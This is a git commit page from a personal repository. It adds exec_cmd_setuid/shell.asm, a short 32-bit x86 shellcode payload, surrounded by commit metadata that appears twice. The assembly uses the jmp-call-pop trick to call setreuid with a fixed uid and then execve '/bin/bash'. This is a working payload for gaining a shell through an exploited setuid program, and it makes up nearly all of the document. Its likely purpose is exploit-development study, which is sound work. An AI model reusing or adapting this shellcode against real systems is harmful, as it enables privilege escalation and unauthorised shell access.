new file: exec_cmd/makefileHEAD master

new file: exec_cmd/shell new file: exec_cmd/shell.asm new file: exec_cmd/shell.o new file: exec_cmd_setuid/makefile new file: exec_cmd_setuid/shell new file: exec_cmd_setuid/shell.asm new file: exec_cmd_setuid/shell.o
author: Brett Weiland <techcrazybsw@gmail.com> 2020-11-20 17:57:20 -0600
committer: Brett Weiland <techcrazybsw@gmail.com> 2020-11-20 17:57:20 -0600
commit: 0c7b4ed75157aa9d781e4eec92a0a604c4c45c9c (patch)
tree: 82d890d910645693ec9140a415f95ae13ab1b85e /exec_cmd_setuid/shell.asm
1 files changed, 28 insertions, 0 deletions
diff --git a/exec_cmd_setuid/shell.asm b/exec_cmd_setuid/shell.asm
new file mode 100644
index 0000000..504685f
--- /dev/null
+++ b/exec_cmd_setuid/shell.asm
@@ -0,0 +1,28 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+
+xor edx, edx
+
+xor eax, eax ; set reuid
+xor ebx, ebx
+xor ecx, ecx
+mov al, 203
+mov bx, 14005 
+mov cx, 14005
+int 0x80
+
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, cmd
+int 0x80
+
+data:
+call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start 
+cmd: db '/bin/bash'
author	Brett Weiland <techcrazybsw@gmail.com>	2020-11-20 17:57:20 -0600
committer	Brett Weiland <techcrazybsw@gmail.com>	2020-11-20 17:57:20 -0600
commit	0c7b4ed75157aa9d781e4eec92a0a604c4c45c9c (patch)
tree	82d890d910645693ec9140a415f95ae13ab1b85e /exec_cmd_setuid/shell.asm